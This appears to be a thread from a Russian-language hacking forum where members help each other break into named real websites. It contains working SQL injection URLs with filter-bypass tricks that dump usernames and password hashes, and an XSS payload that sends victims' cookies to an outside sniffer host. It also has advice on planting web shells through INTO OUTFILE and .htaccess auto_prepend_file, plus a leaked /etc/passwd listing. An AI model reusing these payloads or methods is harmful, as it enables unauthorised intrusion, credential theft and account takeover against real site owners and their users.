u1739821:x:580:577::/var/www/u1739821:/bin/bash
u1739860:x:581:578::/var/www/u1739860:/bin/bash
u1740237:x:582:579::/var/www/u1740237:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
u1741842:x:591:588::/var/www/u1741842:/bin/bash
u1742085:x:593:590::/var/www/u1742085:/bin/bash
u1742435:x:594:591::/var/www/u1742435:/bin/bash
u1730937:x:599:596::/var/www/u1730937:/bin/bash
u1743741:x:601:598::/var/www/u1743741:/bin/bash
u1744116:x:603:600::/var/www/u1744116:/bin/bash
u1744426:x:606:603::/var/www/u1744426:/bin/bash
u1744904:x:610:607::/var/www/u1744904:/bin/bash
u1747647:x:620:617::/var/www/u1747647:/bin/bash
u1750941:x:629:626::/var/www/u1750941:/bin/bash
u1753996:x:638:635::/var/www/u1753996:/bin/bash
u1755152:x:643:640::/var/www/u1755152:/bin/bash
и т.д

На сайте стоит SMF 2.0.4. Есть что к нему? Путь нужно только расскрыть. Спасибо.

Ups said:
Имею читалку.
Есть ли способы найти пути до сайта?
В /etc/passwd простыня:

Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
........
u1724698:x:505:503::/var/www/u1724698:/bin/false
u1725105:x:508:505::/var/www/u1725105:/bin/false
u1725703:x:514:511::/var/www/u1725703:/bin/bash
u1725757:x:515:512::/var/www/u1725757:/bin/false
u1726055:x:517:514::/var/www/u1726055:/bin/bash
u1726273:x:518:515::/var/www/u1726273:/bin/false
u1726588:x:519:516::/var/www/u1726588:/bin/bash
u1727690:x:525:522::/var/www/u1727690:/bin/false
u1727944:x:526:523::/var/www/u1727944:/bin/bash
u1728689:x:529:526::/var/www/u1728689:/bin/bash
u1730438:x:540:537::/var/www/u1730438:/bin/false
u1730873:x:541:538::/var/www/u1730873:/bin/bash
u1731459:x:542:539::/var/www/u1731459:/bin/false
u1732269:x:545:542::/var/www/u1732269:/bin/bash
u1732843:x:558:555::/var/www/u1732843:/bin/bash
u1736727:x:568:565::/var/www/u1736727:/bin/false
u1733648:x:571:568::/var/www/u1733648:/bin/bash
u1739821:x:580:577::/var/www/u1739821:/bin/bash
u1739860:x:581:578::/var/www/u1739860:/bin/bash
u1740237:x:582:579::/var/www/u1740237:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
u1741842:x:591:588::/var/www/u1741842:/bin/bash
u1742085:x:593:590::/var/www/u1742085:/bin/bash
u1742435:x:594:591::/var/www/u1742435:/bin/bash
u1730937:x:599:596::/var/www/u1730937:/bin/bash
u1743741:x:601:598::/var/www/u1743741:/bin/bash
u1744116:x:603:600::/var/www/u1744116:/bin/bash
u1744426:x:606:603::/var/www/u1744426:/bin/bash
u1744904:x:610:607::/var/www/u1744904:/bin/bash
u1747647:x:620:617::/var/www/u1747647:/bin/bash
u1750941:x:629:626::/var/www/u1750941:/bin/bash
u1753996:x:638:635::/var/www/u1753996:/bin/bash
u1755152:x:643:640::/var/www/u1755152:/bin/bash
и т.д

На сайте стоит SMF 2.0.4. Есть что к нему? Путь нужно только расскрыть. Спасибо.


читай /etc/httpd/httpd.conf

BigBear said:
читай /etc/httpd/httpd.conf


HTTP/1.0 404 Not Found

Уже смотрел.

Еще вопрос: где хранятся конфиги с коннектом к БД в IP.Board 3.3.4?

Ups, в корне посмотрите: "conf_global.php"

Помогите раскрутить инъекцию с обходом WAF.

В общем я добился вывода версии, юзера etc, но не могу получить имя БД, таблицы, ну и соответветственно содержимое таблиц.

Фильтрую в /*! */ всё подряд, но 406 ошибка.

Заранее спасибо.


Code:
http://www.lopusina.com/knjiga.html?id=36 /*!union*/(select all 1,/*!version()*/,3,4,5,6,7,8,9,10,11,12)--+

Вывод в 238 строчке исходника.

www.dnrltd.com/job_details.php?id=-64 /*!union*/ (/*!select*/ all 1,2,3,4,5,6,7,8,9,10,11,12,/*!group_concat(column_name)*/,14,15,16 from /*!InForMatioN_SchEma*/.tables where /*!table_name*/ like 0x77705f7573657273 )--+


Помогите прочитать таблицу wp_users

MaxFast said:
Помогите прочитать таблицу wp_users


http://www.dnrltd.com/job_details.php?id=-64%20/*!union*/%20%28/*!select*/%20all%201,2,3,4,5,6,7,8,9,10,11,12,/*!concat_ws%280x3a,user_login,user_pass%29*/,14,15,16%20from%20wp_users+limit+1,1%20%29--+

Code:
http://pfl.ua/articles/?art=1275511872

Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5.

rogatiy said:

Code:
http://pfl.ua/articles/?art=1275511872

Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5.


Фильтруется union и скобки.

rogatiy said:

Code:
http://pfl.ua/articles/?art=1275511872

Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5.



Посредством POST запроса все проходит на ура:

http://pfl.ua/articles/?art=1275511872+or+1+group+by+concat((select+user( )),floor(rand(0)*2))+having+min(0)--+

DATA:

USERflcom_db@localhost

DBflcom_db

DB LIST:

pflcom_db

information_schema

mafpfl

pfl_db

pfl_forum

pflcom_db

Посоветуйте хороший снифер,можна платный.

Sat-hacker said:
Посоветуйте хороший снифер,можна платный.


снифер чего?

нужно узнать ip украсть cookie,нашёл какой-то http://kanick.ru/sniffer/

Но к автору не могу достучаться.

Sat-hacker said:
нужно узнать ip украсть cookie


загрузки на свой сервак, и перенаправь жертву


PHP:

Konqi а если нужно узнать ip браузер и т.д?

Sat-hacker said:
Konqi
а если нужно узнать ip браузер и т.д?


написал же выше, ip тоже пишется, а браузер - $_SERVER['HTTP_USER_AGENT']

вся инфа держится в суперглобальном массиве $_SERVER

курите php

Вот deluxe версия его сниффера http://kanick.ru/sniffer/deluxe.rar

ребят, как получитть шелл с рут доступом, если имеется доступ в phpmyadmin с root аккаунта?

Br@!ns said:
ребят, как получитть шелл с рут доступом, если имеется доступ в phpmyadmin с root аккаунта?


это разные руты. читаем книги MySQL, Linux

http://www.skintologyny.com/admin/login.php

http://www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+users%23

почему не могу войти?

sabe said:
http://www.skintologyny.com/admin/login.php
http://www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+users%23
почему не могу войти?


Там много страниц авторизации

http://www.skintologyny.com/blog/wp-login.php

http://www.skintologyny.com/admin/login.php/admin/verifylogin.php

помогите плз допилить.


Code:
http://wylsacom.planetiphone.ru/blog.php?page=-1 or 1=1 and (select 1 and row(1,1)>(select version(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64) ,CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101), CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2) )x from (select 1 union select 2)a group by x limit 1))

но нехочет выводить ничего(

Решил впервые заняться xss,попался форум vbulletin, на котором есть логин и пароль модератора,зашёл в modcp добавил обьявление в заголовке и в описании ">alert('XSS') всё выполняеться успешно пробую подставить снифер

img = new Image();

img.src = "http://lada-priora.ru/forum/images/deluxe/s.gif?"+document.cookie;



Но на снифер приходит только это QUERY: r4870=1; bblastvisit=1368254092; bblastactivity=0 , ip и agent

Подскажите что не правильно делаю?

Sat-hacker said:
Решил впервые заняться xss,попался форум vbulletin,
...
Подскажите что не правильно делаю?


На vB при некоторых настройках куки привязаны к ip и разумеется всегда httpOnly.

Если удалось получить XSS, нужно её сразу использовать для совершения необходимых действий или найти возможность получения куков другим способом, записать юзер-агент и заходить под IP из той-же подсети.

Вы определитесь, что вам собственно нужно сделать и для чего.

XAMEHA проверял на виртуалке,ip одинаковый,использовал сразу.Хз мож снифер другой попробовать?

Вопрос по XSS

Имеется site1.com.

Так же есть XSS вида alert() (т.е нет фильтрации символов) на site2.com

site1.com грузит через iframe site2.com.

Можно ли получить куки пользователя сайта site1.com используя XSS site2.com ??

Спасибо

WendM said:
Вопрос по XSS
Имеется
site1.com
.
Так же есть XSS вида
alert()
(т.е нет фильтрации символов)
на
site2.com
site1.com
грузит через iframe
site2.com
.
Можно ли получить куки пользователя сайта
site1.com
используя XSS
site2.com
??
Спасибо


нет нельзя. политика безопасности современных браузеров жестока)

А у меня такой вопрос... как происходит восстановление пароля на drupal 6? Если послать запрос на ретрив - пишется куда-нибудь токен?

На сайте рега модерируемая, не глянуть, а двиг скачать пока не позволяет инет лагающий

подскажите?

Можно ли как-нибудь обойти подстановку дефисов в '
[/CODE]
В итоге в конце страницы появляется


Code:


Код, соотв., не выполняется. Это возможно обойти?

Ну и ещё один вопрос - можно ли как-то выяснить оригинальный путь сохранения изображений? Заливаешь, к примеру, abc.php.jpg, а отображается какой-нибудь 1651656541854541.jpg

_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)

Как раскрутить? Фильтрует union и select.

Vip77 said:
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.


В первую очередь, обратил бы ты внимание на то, что фильтрация SLECT & UNION - это вторичное. А первичное - это то, что фильтруется также кавычка, собвственно деформирующая запрос. И пока ты не найдешь способ обойти сей момент, можешь не волноваться по поводу фильтрации всего остального.

Vip77 said:
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.


Cennarios немного ошибся, фильтруется +


http://vkontakte.dj/index.php?option=com_fireboard&Go=1'or(seLEct*from(seLEct(name_const(veRsion(),1) ),name_const(veRsion(),1))a)and(1)='1


http://f3.s.qip.ru/E2nOmN57.jpg

В общем сам добил

username


http://vkontakte.dj/index.php?option=com_fireboard&Go=1'/**/or/**/(seLEct/**/count(*)from(seLEct/**/1/**/uNIon/**/seLEct/**/2/**/uNIon/**/seLEct/**/3)x/**/group/**/by/**/concat(mid((seLEct/**/username/**/from/**/jos_users/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1


http://f1.s.qip.ru/E2nOmN59.jpg

password


http://vkontakte.dj/index.php?option=com_fireboard&Go=1'/**/or/**/(seLEct/**/count(*)from(seLEct/**/1/**/uNIon/**/seLEct/**/2/**/uNIon/**/seLEct/**/3)x/**/group/**/by/**/concat(mid((seLEct/**/password/**/from/**/jos_users/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1


http://f2.s.qip.ru/E2nOmN5a.jpg

Пробелы убрать не забудь

PHP:
Сообщение от sabe

http://www.skintologyny.com/admin/login.php

http://www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+users%23

почему не могу войти?



foma2120 said:
Там много страниц авторизации
http://www.skintologyny.com/blog/wp-login.php
http://www.skintologyny.com/admin/login.php/admin/verifylogin.php



это ведь не от блога пароли указал а от users... а wp_users я не нашел такую таблицу в куррент дб, может кто угадает базу где блог..

а вторая ссылка что ты скинул это верифай логин походу одно и то же что вход в админку почему не пускает оч интересно проблема не решена

помогите узнать ответ)

Добрый день, подскажите, что это за БД такая, с рашрирениями файлов *.bcp, *.idx, *.pre и *.sch

Спасибо

Подскажите что делать далее? Вот нашлась уязвимость:

Source: Form Method: POST

Parameter Name Parameter Type Test Name Severity

+ userid POST SQL Injection (blind test) High

+ submit POST SQL Injection (blind test) High

+ m2hp COOKIE SQL Injection (blind test) High

Как поступать дальше?

x-promt said:
Подскажите что делать далее? Вот нашлась уязвимость:
Source: Form Method: POST
Parameter Name Parameter Type Test Name Severity
+ userid POST SQL Injection (blind test) High
+ submit POST SQL Injection (blind test) High
+ m2hp COOKIE SQL Injection (blind test) High
Как поступать дальше?


Крутить как блайнды. Тебе же написали в каких параметрах SQL инъекты.

День добрый!

Есть ли возможность залить исполняймый файл в данном месте


Code:
http://play-me.ru/users/fileupload/edit

Login:fileupload

pass:fileupload

Есть уязвимый сайт:


Code:
http://www.site.com/?parametr1=parametr2&id=-99'



Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id like '-99'''.
/duyurular.asp, line 5


при


Code:
+union+select+1,2+from+MSysModules2%00#

и так далее выходит вот такая ошибка:


Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.


Кто знает как раскурить такую скулю и в чем вообще проблма с ней?

Есть скуль такого вида:

site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6

Выводимые поля 2,5,6

Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия)

site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysql. user+where+user='ask_user'

На что получаю ошибку

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203

Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?

Evil_Genius said:
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?


всё правильно делаешь, ток может там ковычки фильтруются и из-за этого ошибка

Evil_Genius said:
Есть скуль такого вида:
site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6
Выводимые поля 2,5,6
Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия)
site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysql. user+where+user='ask_user'
На что получаю ошибку
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?


Че дурью то маяться?load_file('/etc/passwd') ; load_file('/home/site/public_html/ask.php')

попробовал load_file и так и сяк и в хэксе - не показыват ничего и ошибок нету

Через софт вот таким запросом выводит содержимое таблицы

site.ru/ask.php?page=ask&cid=999999.9+union+all+select+(select+concat(0x7e, 0x27,unhex(Hex(cast(cms_config.config_name+as+char ))),0x27,0x7e)+from+`site_db`.cms_config+limit+0,1 )+,0x31303235343830303536,0x31303235343830303536,0 x31303235343830303536,0x31303235343830303536,0x313 03235343830303536--

Както выводит содержимое нормально...Но как вывести этот file_priv то?

а нафиг тебе нужен этот file_priv , пробуй сразу заливать шелленг и все

Evil_Genius said:
попробовал load_file и так и сяк и в хэксе - не показыват ничего и ошибок нету
Через софт вот таким запросом выводит содержимое таблицы
site.ru/ask.php?page=ask&cid=999999.9+union+all+select+(select+concat(0x7e, 0x27,unhex(Hex(cast(cms_config.config_name+as+char ))),0x27,0x7e)+from+`site_db`.cms_config+limit+0,1 )+,0x31303235343830303536,0x31303235343830303536,0 x31303235343830303536,0x31303235343830303536,0x313 03235343830303536--
Както выводит содержимое нормально...Но как вывести этот file_priv то?



файл прив так


PHP:
site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysql. user+limit+0,1

и так далее перебираешь лимит пока не переберёшь всех юзеров, хотя не понимаю нафиг оно тебе нужно.

если ковычки не фильтруются то спокойно можно лить шелл, а и на будушие, черз лоад файл если ничего не выводится и нет ошибки это потому что содержимое файла сильно большое,

его нужно по кускам выводить


PHP:
site.ru/ask.php?page=ask&cid=2+union+select+1,substr(load_file('какой� �о файл'),1,99),3,4,5,6

и так дальше перебераешь

Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе

я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д

как получить структуру, колонки и содержимое таблиц я знаю

но вот с LIKE у меня не получается не могу понять почему

чтобы было понятнее я хочу рассмотреть на примере


HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD='

есть инъекция


HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(us erid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20 as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20 as%20nvarchar)%20from%20Piaggio..tbSSORegistration %20where%20userid%3E1)--

Conversion failed when converting the nvarchar value '1370~industrialcars@dealer.piaggio.~???.......... ............' to data type int.

в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword

пробую через LIKE вывести имя таблицы в которой есть колонка emai


HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--

выводит

Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

пробовал указать базу


HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--

пробовал и так


HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%20table_nam e%20like%20'%25email%25')--

подскажите плз кто знает как правильно запрос составить с LIKE

Gorev said:
а нафиг тебе нужен этот file_priv , пробуй сразу заливать шелленг и все


Файл Прив нужен хотя бы чтобы узнать стоит ли возиться с данным сайтом или нафиг выбросить.

Попробовал напрямую залиться, но всё пусто((

site.ru/ask.php?page=ask&cid=2+union+select+1,``,3,4,5,6+from+mysql.user+in to+outfile+`/home/site/subdomains/t44/www/images/1.php`

Кавычки использовал прямые ' и косые ` и так и этак выдает ошибку:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203


qaz said:
файл прив так

PHP:
site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysql. user+limit+0,1

и так далее перебираешь лимит пока не переберёшь всех юзеров, хотя не понимаю нафиг оно тебе нужно.
если ковычки не фильтруются то спокойно можно лить шелл, а и на будушие, черз лоад файл если ничего не выводится и нет ошибки это потому что содержимое файла сильно большое,
его нужно по кускам выводить

PHP:
site.ru/ask.php?page=ask&cid=2+union+select+1,substr(load_file('какой� �о файл'),1,99),3,4,5,6

и так дальше перебераешь


Перебор лимитом тоже не помогает при выводе файл прив.

Лоад файл тоже не помогает как ты указал, выдает ошибки:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203

Помогите, пожалуйста, пока мозг не взорвался)

Уязвимость - error based в POST запросе, но параметра такого вида: cell_coordinates=1_11, два числа, разделенных нижним подчеркиванием, координаты.

И имя базы, и версия выводятся нормально:

запрос:


cell_coordinates=1_11 OR 1 GROUP BY CONCAT(concat(0x27,version()),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=


ответ:


Duplicate entry ''5.0.95-log1' for key 1:



Но, как только идет запрос с "_", сразу вываливается синтаксическая ошибка, видимо поэтому с information_schema не получается вытащить имена таблиц, перебором нашел единственную таблицу items, ее данные вытаскиваются хорошо, но сайт на dle и все остальные таблицы с префиксом, и их даже перебором не подобрать:

подбор без префикса


cell_coordinates=1_11 OR 1 GROUP BY CONCAT((select concat(0x7233646D3076335F73716C5F696E6A656374696F6 E,count(*)) from u47424.users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=


ответ:


Table 'u47424.users' doesn't exist


с префиксом:


cell_coordinates=1_11 OR 1 GROUP BY CONCAT((select concat(0x7233646D3076335F73716C5F696E6A656374696F6 E,count(*)) from u47424.dle_users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=


ответ:


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND y_id = 1 AND map_id = 53 LIMIT 0,1' at line 1


Видимо параметр разделяется на два по нижнему подчеркиванию "_", и при наличии его в инъекции все идет хз как, как от него можно избавиться? Несколько страниц назад была такая же проблема, там советовали менять _ на %255f или %5f, не помогает

dpash, попробуйте в качестве альтернативы подчеркивания использовать CHAR(тут код символа)

VY_CMa said:
dpash
, попробуйте в качестве альтернативы подчеркивания использовать CHAR(тут код символа)


вот так?


cell_coordinates=1_11 OR 1 GROUP BY CONCAT((select concat(0x7233646D3076335F73716C5F696E6A656374696F6 E,count(*)) from u47424.dleCHAR(95)users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=


опять ошибка:


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(95)users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1 AND y_id = 1 AND map_id = 5' at line 1


Если что, извиняюсь за нубство(

Добрый вечер.

нашел слепую скулю, раньше с ними не встречался... хавиж ее перебирает как-то так -


and+ascii%28substring%28%28select+users.login+from +troop.users+Order+by+login+limit+17%2C1%29%2C3%2C 1%29%29%3d34


Начал он переберать с спецсимволов, а база логинов там на пару тысяч + жует кирилицу, выдает вместо нее ???.

Ник админа заранее известен. Как вытащить его данные?

justonline said:
Начал он переберать с спецсимволов, а база логинов там на пару тысяч + жует кирилицу, выдает вместо нее ???.


Попробуй sqlmap, он намного лучше работает с кириллицей и вообще с кодировками, если лень - кинь в ЛС где и что, попробую помочь, хоть отвлекусь от своей "уязвимости" немного)

justonline said:
Добрый вечер.
нашел слепую скулю, раньше с ними не встречался... хавиж ее перебирает как-то так -
Начал он переберать с спецсимволов, а база логинов там на пару тысяч + жует кирилицу, выдает вместо нее ???.
Ник админа заранее известен. Как вытащить его данные?


Примерно так:


and (SUBSTRING((SELECT users.login+
from+troop.users+where+login=0x[нужный логин в хексе]+limit+0,1
),1,1))>char(50)

про LIKE в MSSQL никто не знает чтоли как правильно запрос составить?

w0rkX said:
про LIKE в MSSQL никто не знает чтоли как правильно запрос составить?


Также как и в Мусукле, но нужно учитывать кодировки текста, которого ищешь, и текста, в котором ищешь. Они должны строго совпадать.

BigBear said:
Также как и в Мусукле, но нужно учитывать кодировки текста, которого ищешь, и текста, в котором ищешь. Они должны строго совпадать.


все правильно с кодировками

пробовал в char email кодировать

char(101)%2Bchar(109)%2Bchar(97)%2Bchar(105)%2Bcha r(108)

тоже без результата

select top 1 table_name from information_schema.tables where table_name like '%email%'

такой запрос в sql inj не будет работать!

а вот так

SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’

говорит

Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

пробовал на разных инъекциях везде одно и тоже, как-то по другому видимо нужно

проблема не в кодировке и такие колонки есть в базе юзера мсскл

w0rkX said:
все правильно с кодировками
пробовал в char email кодировать
char(101)%2Bchar(109)%2Bchar(97)%2Bchar(105)%2Bcha r(108)
тоже без результата
select top 1 table_name from information_schema.tables where table_name like '%email%'
такой запрос в sql inj не будет работать!
а вот так
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’
говорит
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.
пробовал на разных инъекциях везде одно и тоже, как-то по другому видимо нужно
проблема не в кодировке и такие колонки есть в базе юзера мсскл


Попробуй прохексить поисковое значение в like:

select top 1 table_name from information_schema.tables where table_name like 0x25656D61696C25

P.S: email скорее всего в вашем случае должен быть в column_name а не в table_name

есть еозможность чеерез админку редактировать htaccess, можно ли ккак-то алить шелл через него?

qaz said:
есть еозможность чеерез админку редактировать htaccess, можно ли ккак-то алить шелл через него?


А ничего больше заливать нельзя? Может проще в htaccess указать, чтобы пхп парсер проверял дополнительные файлы с нестандартным раширением (допустим картинок, которые очень часто в админках можно загружать).

Melfis said:
А ничего больше заливать нельзя? Может проще в htaccess указать, чтобы пхп парсер проверял дополнительные файлы с нестандартным раширением (допустим картинок, которые очень часто в админках можно загружать).


он не заливается, а посто редактируется, я хотел прописать строчки чтобы он картинки как php обрабатывал, но мне мешает htaccess который лежит в каталоге с картинками

qaz said:
он не заливается, а посто редактируется, я хотел прописать строчки чтобы он картинки как php обрабатывал, но мне мешает htaccess который лежит в каталоге с картинками


А можно попробовать создать еще одну папку и в нее свой .htaccess нужного содержания залить? или не вариант?

bestoloch said:
А можно попробовать создать еще одну папку и в нее свой .htaccess нужного содержания залить? или не вариант?


а смысл,в ту папку надо будет еще залить наш шелл залить

ибо хтаккес не в корневой дериктории

bestoloch said:
А можно попробовать создать еще одну папку и в нее свой .htaccess нужного содержания залить? или не вариант?


я кроме как редачиь htaccess и заливать картинки ничего не могу

qaz said:
я кроме как редачиь htaccess и заливать картинки ничего не могу


тогда копай в сторону кривого кода аплоадера картинок

иначе никак

qaz said:
есть еозможность чеерез админку редактировать htaccess, можно ли ккак-то алить шелл через него?


Да, разрешаешь в нем чтение .htaccess всем (или только себе),

указываешь выполнять .htaccess как php скрипт,

и тут же пишешь код.

Сначала поэкспериментируй на локалхост.

Код приводить не буду.

nikp said:
Да, разрешаешь в нем чтение .htaccess всем (или только себе),
указываешь выполнять .htaccess как php скрипт,
и тут же пишешь код.
Сначала поэкспериментируй на локалхост.
Код приводить не буду.



Проще залить шелл в формате изображения и потом через вышеуказанный .htaccess посредством директивы append(prepend) выполнить. К тому-же, выполнить в теле htaccess явно - не получится, синтаксис htaccess жестко формален и при помещении php кода внуть вызывает 500 ошибку

nikp said:
Да, разрешаешь в нем чтение .htaccess всем (или только себе),
указываешь выполнять .htaccess как php скрипт,
и тут же пишешь код.
Сначала поэкспериментируй на локалхост.
Код приводить не буду.


такс, поексперементировал,


PHP:


Allow from 100.247.115.100

AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess

#

файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог


Cennarios said:
Проще залить шелл в формате изображения и потом через вышеуказанный .htaccess посредством директивы append(prepend) выполнить. К тому-же, выполнить в теле htaccess явно - не получится, синтаксис htaccess жестко формален и при помещении php кода внуть вызывает 500 ошибку




PHP:


Allow from 100.247.115.100



php_value auto_prepend_file/home/domains/h.ru/public_html/phps.jpg

а как мне его заставить выполнить код который в картинке?

qaz said:
такс, поексперементировал,

PHP:


Allow from 100.247.115.100

AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess

#

файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог

PHP:


Allow from 100.247.115.100



php_value auto_prepend_file/home/domains/h.ru/public_html/phps.jpg

а как мне его заставить выполнить код который в картинке?



php_value или php_admin_value

auto_prepend_file или auto_append_file

Путь к картинке содержащей обрамленный php-тегами код: /home/domains/h.ru/public_html/phps.jpg

Если в самом конфиге апача вышеуказанные директивы уже описаны, то переопределяться в .htaccess файлах не будут.

P.S. Как итересная альтернатива коду в картинке можно попробовать приатачить лог перебором пути - /proc/self/fd/2 etc...

qaz said:
такс, поексперементировал,
файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог
а как мне его заставить выполнить код который в картинке?


Молодец, оба варианта правильные.

Если на сервере команды не выполняются, значит нарушены условия http://php.net/manual/ru/configuration.changes.php

Т.е. нужно, чтобы php запускался, как модуль Апача и разрешены AllowOverride All или AllowOverride Options.

Allow from 100.247.115.100



AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess

#

Этот вариант неправильный. Вот тут - # решетка - знак комментария, чему тут выполняться то? Уберешь решетку - получишь 500 ошибку на синтаксисе htaccess файла

Cennarios said:

Allow from 100.247.115.100

AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess
#
Этот вариант неправильный. Вот тут - # решетка - знак комментария, чему тут выполняться то? Уберешь решетку - получишь 500 ошибку на синтаксисе htaccess файла


Правильный, ты не понял фишку этого комментария

Пробуй


PHP:


allow from all

AddType application/x-httpd-php .htaccess

#

Где-то есть зависимость от базовых правил httpd.conf, так как на одном сервере заработало а на другом нет.

P.S.

натолкнуло на интересную мысль: Добавив DirectoryIndex .htaccess можно через теже non-GPC принимать данные на выполнение команд или кода в ракурсе бэкдора на сайте.

P.S.

Причем если php engine OFF или noexec то будет отдано как plain.

Тогда вариант - shtml если настроено на сервере(предположение)

Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?

Protocoler said:
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?


Я бы поступил так - скачал Burp Proxy, запустил его, в Хавиже вбил прокси 127.0.0.1:8080, и посмотрел каким запросом он крутит. Еще проще, если есть виртуалка с linux, натравить sqlmap на нее и включить вывод запросов/ответов к серверу параметром -v 6

Protocoler said:
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?


фильтры

Protocoler said:
